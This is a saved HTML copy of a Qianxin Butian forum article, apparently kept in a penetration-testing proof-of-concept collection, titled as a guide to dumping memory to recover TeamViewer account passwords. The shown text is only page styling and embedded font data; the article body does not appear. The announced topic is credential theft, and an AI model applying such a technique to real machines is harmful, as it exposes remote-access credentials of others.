Penetration_Testing_POC/books/Dump内存得到TeamViewer账号密码.html

883 lines
1.8 MiB
HTML
Raw Normal View History

2024-06-27 08:44:44 -07:00
<!DOCTYPE html> <html style><!--
Page saved with SingleFile
url: https://forum.butian.net/share/1029
--><meta charset=utf-8>
<meta http-equiv=X-UA-Compatible content="IE=edge">
<meta name=viewport content="width=device-width, initial-scale=1">
<meta name=csrf-token content=47Je2DgOpWt2shRy4BwQ1k8Kv2Q2nhWSor3Tvjl1>
<title>Dump内存得到TeamViewer账号密码</title>
<meta name=keywords content=奇安信,天眼,补天,漏洞,情报,攻防,安全>
<meta name=description content=奇安信攻防社区-Dump内存得到TeamViewer账号密码>
<meta name=author content="QIANXIN Team">
<meta name=copyright content="2021 QIANXIN.com">
<style>@media(max-width:767px){}</style>
<style>/*!
* Bootstrap v3.4.1 (https://getbootstrap.com/)
* Copyright 2011-2019 Twitter, Inc.
* Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
*//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}footer,nav{display:block}a{background-color:transparent}a:active,a:hover{outline:0}img{border:0}button,input,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}button{text-transform:none}button{-webkit-appearance:button}textarea{overflow:auto}/*! Source: https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css */@font-face{font-family:"Glyphicons Halflings";src:url(data:font/woff2;base64,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
<style>/*!
* Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome
* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
*/@font-face{font-family:"FontAwesome";src:url(data:font/woff2;base64,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
<style>@media(min-width:1200px){.navbar-form{width:235px}}@media(min-width:768px){.navbar-form .form-control{width:100%}}@media(max-width:767px){.global-nav{width:100%;text-align:center;z-index:1000}}@media(max-width:767px){}.global-nav .nav{height:44px;padding:0}.navbar-form .btn{position:absolute;top:8px;right:30px;color:#999;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none}.navbar-form .btn:hover,.navbar-form .btn:focus{color:#777}pre{white-space:pre-wrap}@media(min-width:768px){}@media(min-width:992px){}@media(min-width:1200px){}html{font-size:10px;-webkit-tap-highlight-color:transparent}body{font-family:-apple-system,"Helvetica Neue",Helvetica,Arial,"PingFang SC","Hiragino Sans GB","WenQuanYi Micro Hei","Microsoft Yahei",sans-serif;font-size:14px;line-height:1.5;color:#333;background-color:#f6f6f6;word-break:break-word}button,input,textarea{font-family:inherit;font-size:inherit;line-height:inherit}ul{padding:0}.wrap{padding-bottom:30px;position:relative}.main{background-color:#fff;border-radius:4px}.mb-20{margin-bottom:20px}.mb-50{margin-bottom:50px}.mt-10{margin-top:10px}.mt-15{margin-top:15px}.mt-20{margin-top:20px}.mt-30{margin-top:30px}.mt-60{margin-top:60px}.mr-5{margin-right:5px}.span-line{margin-left:8px;margin-right:8px;color:#999}.logo{float:left;margin:0;display:inline-block;width:150px}.logo a{display:block;height:50px;width:145px;background-image:url(
<style>a{color:#009a61;text-decoration:none}a:focus,a:hover{color:#004e31;text-decoration:underline}.navbar-inverse{background-color:#2a8c70;border-color:#2b7a5c}.navbar-inverse .navbar-nav>li>a{color:#fff;padding-left:6px;padding-right:6px}.navbar-inverse .navbar-collapse,.navbar-inverse .navbar-form{border-color:#008151}@media(max-width:767px){}@media(max-width:767px){}.tag{display:inline-block;padding:0 8px;color:#017e66;background-color:#e7f2ed;height:24px;line-height:24px;font-weight:400;font-size:13px;text-align:center}.tag[href]:focus,.tag[href]:hover{background-color:#017e66;color:#fff;text-decoration:none}.btn-success{border-color:#4cae4c;background-color:#5cb85c;color:#fff}</style>
<style>@-moz-keyframes blink{50%{background-color:transparent}}@-webkit-keyframes blink{50%{background-color:transparent}}@keyframes blink{50%{background-color:transparent}}pre code.hljs{overflow-x:auto}.hljs{color:#000}.hljs-comment{color:green}.hljs-built_in,.hljs-keyword{color:#00f}.hljs-literal,.hljs-string,.hljs-title{color:#a31515}.hljs-meta{color:#2b91af}.markdown-body{color-scheme:light;--color-prettylights-syntax-comment:#6e7781;--color-prettylights-syntax-constant:#0550ae;--color-prettylights-syntax-entity:#8250df;--color-prettylights-syntax-storage-modifier-import:#24292f;--color-prettylights-syntax-entity-tag:#116329;--color-prettylights-syntax-keyword:#cf222e;--color-prettylights-syntax-string:#0a3069;--color-prettylights-syntax-variable:#953800;--color-prettylights-syntax-brackethighlighter-unmatched:#82071e;--color-prettylights-syntax-invalid-illegal-text:#f6f8fa;--color-prettylights-syntax-invalid-illegal-bg:#82071e;--color-prettylights-syntax-carriage-return-text:#f6f8fa;--color-prettylights-syntax-carriage-return-bg:#cf222e;--color-prettylights-syntax-string-regexp:#116329;--color-prettylights-syntax-markup-list:#3b2300;--color-prettylights-syntax-markup-heading:#0550ae;--color-prettylights-syntax-markup-italic:#24292f;--color-prettylights-syntax-markup-bold:#24292f;--color-prettylights-syntax-markup-deleted-text:#82071e;--color-prettylights-syntax-markup-deleted-bg:#ffebe9;--color-prettylights-syntax-markup-inserted-text:#116329;--color-prettylights-syntax-markup-inserted-bg:#dafbe1;--color-prettylights-syntax-markup-changed-text:#953800;--color-prettylights-syntax-markup-changed-bg:#ffd8b5;--color-prettylights-syntax-markup-ignored-text:#eaeef2;--color-prettylights-syntax-markup-ignored-bg:#0550ae;--color-prettylights-syntax-meta-diff-range:#8250df;--color-prettylights-syntax-brackethighlighter-angle:#57606a;--color-prettylights-syntax-sublimelinter-gutter-mark:#8c959f;--color-prettylights-syntax-constant-other-reference-link:#0a3069;--color-fg-default:#24292f;--color-fg-muted:#57606a;--color-fg-subtle:#6e7781;--color-canvas-default:#fff;--color-canvas-subtle:#f6f8fa;--color-border-default:#d0d7de;--color-border-muted:hsl(210,18%,87%);--color-neutral-muted:rgba(175,184,193,0.2);--color-accent-fg:#0969da;--color-accent-emphasis:#0969da;--color-attention-subtle:#fff8c5;--color-danger-fg:#cf222e}.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;margin:0;color:var(--color-fg-default);background-color:var(--color-canvas-default);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji";font-size:16px;line-height:1.5;word-wrap:break-word}.markdown-body img{border-style:none;max-width:100%;-webkit-box-sizing:content-box;box-sizing:content-box;background-color:var(--color-canvas-default)}.markdown-body ::-webkit-input-placeholder{color:inherit;opacity:.54}.markdown-body ::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}.markdown-body h2,.markdown-body h3{margin-top:24px;margin-bottom:16px;line-height:1.25}.markdown-body h2{font-weight:600;padding-bottom:.3em;font-size:1.5em;border-bottom:1px solid var(--color-border-muted)}.markdown-body h3{font-weight:600;font-size:1.25em}.markdown-body ol{padding-left:2em}.markdown-body code{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace}.markdown-body pre{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace;word-wrap:normal}.markdown-body ::-webkit-input-placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body ::placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body::before{display:table;content:""}.markdown-body::after{display:table;clear:both;content:""}.markdown-body>*:first-child{margin-top:0 !important}.markdown-body>*:last-child{margin-bottom:0 !important}.markdown-body p,.markdown-body ol,.markdown-body pre{margin-top:0;margin-bottom:16px}.markdown-body li+li{margin-top:.25em}.markdown-body code{border-radius:6px}.markdown-body pre code{font-size:100%}.markdown-body pre
<style>#md_view{padding:0 20px}#md_view img:hover{cursor:pointer}</style>
<!--[if lt IE 9]>
<script src="/static/js/html5shiv.min.js"></script>
<script src="/static/js/respond.min.js"></script>
<![endif]-->
<style>html #layuicss-skinlayercss{display:none;position:absolute;width:1989px}@-webkit-keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);-ms-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}}@-webkit-keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);-ms-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);-ms-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
* Waves v0.7.5
* http://fian.my.id/Waves
*
* Copyright 2014-2016 Alfiana E. Sibuea and other contributors
* Released under the MIT license
* https://github.com/fians/Waves/blob/master/LICENSE
*/</style><style>@media(max-height:620px){}@media(max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media(pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes 